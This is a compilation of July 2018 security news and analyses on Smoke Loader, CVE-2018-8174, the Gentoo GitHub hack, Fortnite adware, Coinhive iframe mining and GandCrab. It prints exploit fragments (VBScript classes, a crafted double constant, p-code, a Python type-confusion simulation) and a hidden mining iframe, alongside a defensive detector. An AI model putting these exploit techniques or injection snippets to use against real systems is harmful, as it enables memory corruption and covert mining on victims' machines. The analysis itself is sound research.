New Smoke Loader Attack Targets Multiple Credentials
5.7.2018 securityweek Virus

A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.

The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.

Once executed, the macro initiates a second stage and downloads the TrickBot malware, which in turn fetches the Smoke Loader backdoor, Cisco Talos reports.

Smoke Loader has long been used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some previous campaigns it was also used as a dropper for TrickBot, but it appears the tables have now turned.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.

The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into. Instead it calls the Windows API GetShellWindow, then calls GetWindowThreadProcessId to obtain the process ID of Explorer.exe. It then uses the PROPagate technique to inject code into Explorer.

First described in late 2017, the method has not been adopted by any other malware to date, and no public proof-of-concept (PoC) has been published. Smoke Loader is the first to use the technique, as FireEye also reported last week.

The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.

Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.

All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.

The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP and IMAP credentials.

The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerability
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability in Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit for CVE-2014-6332, which essentially “corrupts” two memory objects, changing the type of one object to Array (for read/write access to the address space) and the other to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no publicly available information about the internal structure of this virtual machine or its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in memory, for the IDA Pro and WinDbg debuggers, are available in our GitHub repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (locals, arguments and values on the stack) are represented as a 16-byte VARIANT structure, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1 <-------- put argument on stack
0005 OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call and store returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl("174088534690791e-324")
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl("174088534690791e-324") *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl("174088534690791e-324") *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to a VARIANT of type Double and stores it in local variable 0, which is reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This triggers garbage collection of the ‘Class1’ instance and, because of the use-after-free vulnerability in Class_Terminate() that we discussed earlier, leaves a dangling pointer reference.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
The location of variables in memory is predictable. The size of a VVAL structure is 0x32 bytes plus the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.
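To make this type-confusion step concrete, here is an added Python example (not part of the original analysis and not one of Kaspersky's scripts) that applies the VVAL size formula above to the two classes and shows why the constant CDbl("174088534690791e-324") was chosen. It assumes the standard OLE VARIANT layout (vt in the first 16-bit word, payload at offset 8), a 32-bit process, VVALs laid out back-to-back in creation order, and uses a constructed placeholder BSTR pointer.

```python
import struct

# OLE Automation VARTYPE values (wtypes.h); VT_ARRAY is a flag OR'ed onto the element type.
VT_I4, VT_R8, VT_BSTR, VT_DISPATCH, VT_VARIANT = 0x3, 0x5, 0x8, 0x9, 0xC
VT_ARRAY = 0x2000
VT_NAMES = {VT_I4: "VT_I4", VT_R8: "VT_R8", VT_BSTR: "VT_BSTR",
            VT_DISPATCH: "VT_DISPATCH", VT_VARIANT: "VT_VARIANT"}

VARIANT_SIZE = 16   # vt (2 bytes) + three reserved words (6 bytes) + 8-byte data union
VVAL_HEADER = 0x32  # a VVAL occupies 0x32 bytes plus the UTF-16 length of its name (article)


def vt_name(vt):
    """Decode a 16-bit VARTYPE into a readable name, honouring the VT_ARRAY flag."""
    base = vt & 0x0FFF
    name = VT_NAMES.get(base, f"0x{base:X}")
    return f"VT_ARRAY|{name}" if vt & VT_ARRAY else name


def double_variant(value):
    """The 16-byte VARIANT CDbl() yields: vt=VT_R8, reserved words zero, IEEE double at offset 8."""
    return struct.pack("<HHHH", VT_R8, 0, 0, 0) + struct.pack("<d", value)


def bstr_variant(ptr):
    """A String VARIANT in an assumed 32-bit process: vt=VT_BSTR, 4-byte BSTR pointer, padding zero."""
    return struct.pack("<HHHH", VT_BSTR, 0, 0, 0) + struct.pack("<II", ptr, 0)


def exploit_constant_bits():
    """Raw 64-bit pattern of CDbl("174088534690791e-324"), a subnormal double."""
    return struct.unpack("<Q", struct.pack("<d", float("174088534690791e-324")))[0]


def vval_size(name):
    return VVAL_HEADER + 2 * len(name)


def mem_offset(members_before_mem):
    """Offset of the 'mem' VVAL inside a class, given the members created before it."""
    return sum(vval_size(n) for n in members_before_mem)


def class2_shift():
    """How far Class2's 'mem' lies past Class1's 'mem' when Class2 is allocated over Class1.

    Assumption: VVALs sit back-to-back in creation order (OP_FnBindEx 'p', OP_FnBindEx 'SetProp',
    OP_CreateVar 'mem' for Class1; P0123456789, SPP, mem for Class2).
    """
    return mem_offset(["P0123456789", "SPP"]) - mem_offset(["p", "SetProp"])


def simulate_overwrite():
    """Replay the dangling write and return (Class2 'mem' vt before, vt after)."""
    shift = class2_shift()
    image = bytearray(VARIANT_SIZE + shift)  # constructed memory image, not a real heap dump
    constructed_bstr_ptr = 0x0C0C0C0C       # placeholder pointer standing in for a real BSTR
    image[shift:shift + VARIANT_SIZE] = bstr_variant(constructed_bstr_ptr)
    before = struct.unpack_from("<H", image, shift)[0]

    # OP_NamedSt 'mem' in Class1's SetProp stores the getter's Double through the freed VVAL.
    image[0:VARIANT_SIZE] = double_variant(float("174088534690791e-324"))
    after = struct.unpack_from("<H", image, shift)[0]
    return before, after


if __name__ == "__main__":
    print(f"CDbl constant bits : 0x{exploit_constant_bits():016X}")
    print(f"Class2 'mem' shift : {class2_shift()} bytes")
    before, after = simulate_overwrite()
    print(f"Class2 'mem' vt    : {vt_name(before)} -> {vt_name(after)}")
```

The Double's payload bytes 00 00 00 00 0C 20 00 00 land exactly on the vt word of Class2's 'mem' VARIANT, which is why a 12-byte difference in member-name lengths turns a String into a VT_ARRAY|VT_VARIANT.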

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our GitHub repository.

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Gentoo Publishes Incident Report After GitHub Hack

5.7.2018 securityweek Hacking

Gentoo GitHub account hacked

Maintainers of the Gentoo Linux distribution published an incident report on Wednesday after someone hijacked one of the organization’s GitHub accounts and planted malicious code.

The attack started on June 28 and the hacker (or hackers) not only changed content in compromised repositories, but also locked out Gentoo developers from the targeted GitHub account. This made the attack “loud” – Gentoo believes the hackers could have maintained access longer had they been quieter.

GitHub could not be used by Gentoo for a total of five days as a result of the incident. The breach also led to a disruption of the Gentoo Proxy Maintainers Project as it uses GitHub to submit pull requests, and all past pull requests were disconnected from their original commits.

The attacker also attempted to wipe users’ files by adding “rm -rf” to some repositories, but Gentoo believes this method was unlikely to work due to “various technical guards.”

The GitHub account was compromised after the hacker gained access to an admin account that had a predictable password.

“Evidence collected suggests a password scheme where disclosure on one site made it easy to guess passwords for unrelated webpages,” Gentoo wrote in its incident report.

The incident report summarizes the lessons learned by Gentoo following the incident and the actions taken or planned in response. These actions include making frequent backups, requiring the use of two-factor authentication (2FA) and introducing support for hardware-based 2FA, reducing the number of users with elevated privileges, auditing logins, publishing password policies, and suggesting the use of password managers.

Gentoo is also working on an incident response plan, particularly for sharing information about a security incident with users.

The maintainers of the Linux distribution believe the breach has been contained and restored the impacted GitHub page.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity

5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But it is a short-sighted approach, since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on Huawei goods could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.



Adware already infected at least 78000 Fortnite Players
5.7.2018 securityaffairs Virus

Rainway reported that tens of thousands of Fortnite players have been infected with adware while downloading fake V-Bucks generators.
Fortnite continues to be one of the most popular games, and crooks are trying to target its millions of fans in different ways.

In June, experts observed cyber criminals attempting to exploit interest in the forthcoming Fortnite Android release to infect millions of fans.

Users interested in the Android version of the popular game are not the only targets: crooks are now going after gamers searching for Fortnite V-Bucks generators.

V-Bucks are the in-game currency that can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign: in the former to purchase new customization items, in the latter to purchase Llama Pinata card packs.

Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.


Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.

The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website the victim visits.

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after noticing hundreds of thousands of error reports in their server logs. The internal staff discovered that their users’ systems were attempting to connect to various ad platforms.

Since the Rainway client only loads content from whitelisted domains, all the requests discovered by the company, which attempted to download ads from other domains, were triggering connection errors.

Rainway experts analyzed hundreds of Fortnite cheat tools, searching for the ones that generated the same errors reported by Rainway users.

Rainway discovered that the errors came from systems infected with a fake V-Bucks generator.

Searching online, it is quite easy to find all kinds of software posing as Fortnite hack tools. These applications are advertised through YouTube videos and claim to let players generate free V-Bucks, in addition to a classic aimbot.


Once the malicious code has infected the player’s system, it immediately installs a root certificate and configures Windows to route web traffic through a proxy.

This specific campaign was delivering adware that alters the pages of a web request to inject ads.

The Rainway team identified the servers hosting the malware; they had been compromised by the attackers, who were abusing them. The experts notified the company operating the compromised servers, which quickly removed the malware.

“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”

“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.

Rainway is warning gamers not to install hack tools or game cheats.

Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.


Crooks leverage obfuscated Coinhive shortlink in a large crypto-mining operation
5.7.2018 securityaffairs Cryptocurrency

Crooks are using an alternative scheme to mine cryptocurrency: they don’t inject the CoinHive JavaScript miner directly into compromised websites.
Security researchers at Malwarebytes Labs have uncovered a new crypto-mining campaign that, unlike other campaigns, does not inject the CoinHive JavaScript miner directly into compromised websites.

CoinHive also provides a “URL shortener” service that lets users create a short link for any URL. The one difference from similar services is that it introduces a delay, during which the visitor’s browser mines Monero, before redirecting the user to the original URL.

The redirection time is adjustable via Coinhive’s settings, this means that the attackers can force visitors’ web browsers to mine cryptocurrency for a longer period.

The experts at Malwarebytes discovered a large number of legitimate websites have been hacked by crooks to load short URLs generated using the CoinHive service through a hidden HTML iFrame. With this trick, attackers aim at forcing visitors’ browsers into mining cryptocurrencies.

“We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.” reads the analysis published by Malwarebytes.

<iframe src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></iframe>

“The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.”

This mining scheme is a novelty in the threat landscape because it does not rely on injecting CoinHive's JavaScript into the compromised websites.

Malwarebytes experts linked this last campaign to the one monitored by Sucuri researchers in May.

The attackers add obfuscated JavaScript code to the compromised websites; this code dynamically injects an invisible iframe (1×1 pixel) into the webpage as soon as it loads in the browser.

The webpage then automatically starts mining until the Coinhive short-link service redirects the user to the original URL.
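The injection chain described above (a hex-encoded blurb inside a script that, once decoded, becomes a 1×1 iframe pointing at a Coinhive shortlink) is simple to hunt for in saved page source. The following Python is an added example written for this page, not code from Malwarebytes or Sucuri: it decodes runs of \xNN or %NN escapes found in a page, parses any iframe tags in both the raw markup and the decoded blobs, and reports those that load a Coinhive host while being hidden by 1×1 dimensions or inline CSS. The sample page is constructed here; only the shortlink path 3h2b2 comes from the analysis quoted above, the surrounding page and the second iframe are made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts Coinhive served its miner and its hash-gated shortlinks from
# (written defanged as cnhv[.]co in the write-up above).
COINHIVE_HOSTS = {"cnhv.co", "coinhive.com", "authedmine.com"}

# Runs of at least four \xNN or %NN escapes: the "blurb of hexadecimal code"
# that the injected script decodes at page load.
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){4,}")


def decode_hex_blobs(text):
    """Return every escaped run in `text`, decoded to a string."""
    return [unquote(m.group(0).replace("\\x", "%")) for m in HEX_RUN.finditer(text)]


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))


def iframes_in(fragment):
    parser = _IframeCollector()
    parser.feed(fragment)
    parser.close()
    return parser.frames


def _is_tiny(value):
    """True for width/height values of one pixel or less."""
    try:
        return int(str(value).lower().rstrip("px")) <= 1
    except ValueError:
        return False


def is_hidden(attrs):
    """1x1 (or smaller) frame, or a frame hidden through inline CSS."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (_is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def find_hidden_miner_frames(page):
    """Return (src, was_hex_encoded) for each hidden iframe that loads a Coinhive host.

    Both the raw markup and every decoded hex blob are inspected, so the frame
    is found whether it sits in the HTML or is document.write()n by an
    obfuscated script.
    """
    hits = []
    fragments = [(page, False)] + [(blob, True) for blob in decode_hex_blobs(page)]
    for fragment, decoded in fragments:
        for attrs in iframes_in(fragment):
            src = attrs.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host in COINHIVE_HOSTS and is_hidden(attrs):
                hits.append((src, decoded))
    return hits


def _percent_encode(s):
    return "".join("%%%02X" % b for b in s.encode())


# Constructed sample page: a benign embed plus an injected script in the style
# of the campaign. Only the shortlink path "3h2b2" comes from the analysis above.
INJECTED_PAGE = (
    "<html><body><h1>Shop</h1>\n"
    "<script>document.write(unescape('"
    + _percent_encode('<iframe src="https://cnhv.co/3h2b2" width="1" height="1" align="left"></iframe>')
    + "'));</script>\n"
    '<iframe src="https://www.example.com/embed/42" width="560" height="315"></iframe>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for src, decoded in find_hidden_miner_frames(INJECTED_PAGE):
        print("hidden Coinhive frame:", src, "(hex-encoded)" if decoded else "")
```

Run against a directory of saved pages, the script flags only frames that are both Coinhive-bound and hidden, so a legitimate, visible Coinhive shortlink embed is not reported; the decoded blobs are also worth saving, since the same hex-encoding trick is used to hide other injected markup.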


“In Figure 3, we made the iframe visible by changing its dimensions to show that, rather than waiting a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page,” continues the analysis from Malwarebytes. “Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.”
Experts also discovered that the cybercriminals are injecting hyperlinks to other compromised websites that trick victims into downloading desktop cryptocurrency miners disguised as legitimate software.

“In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online,” continues the researchers.

“In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners.”

Further technical details about the campaign, including the IoCs, are reported in the blog post.


The GandCrab ransomware V4 appears in the threat landscape
4.7.2018 securityaffairs
Ransomware

A new version of the dreaded GandCrab ransomware (V4) was released over the weekend and, according to the experts who analysed it, it includes numerous changes.

Fly
@china591
New #GandCrab version "V4" GANDCRAB V4 Ransomware – Remove and Restore .KRAB Encrypted Files

Fly
@china591
Replying to @malwrhunterteam and 2 others
https://www.virustotal.com/#/file/ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23/detection …https://app.any.run/tasks/daa35edf-94dc-416b-a7b1-fd45b6900c43 …

MD5: 97a910c50171124f2cd8cfc7a4f2fa4f
SHA-1: 3737d782cb64fa92d2c42f3c2857ee2295dc8aa4
Authentihash: d64152842b2b787a86bb5dd2084ae40efd9914df8a880eb242f67ce5447a46f6

10:29 AM - Jul 3, 2018
GandCrab V4 uses a different encryption algorithm (likely the Salsa20 stream cipher) and a new Tor payment site (gandcrabmfe6mnef.onion); it appends the “.KRAB” extension to encrypted file names and uses a new ransom note name.


Marcelo Rivero
@MarceloRivero
· 3 Jul
#GandCrab #v4 🦀🆕
[+] Extension: ".KRAB"
[+] Internal version: 4.0
[+] Note: KRAB-DECRYPT.txt
[+] Tor: gandcrabmfe6mnef[.]onion
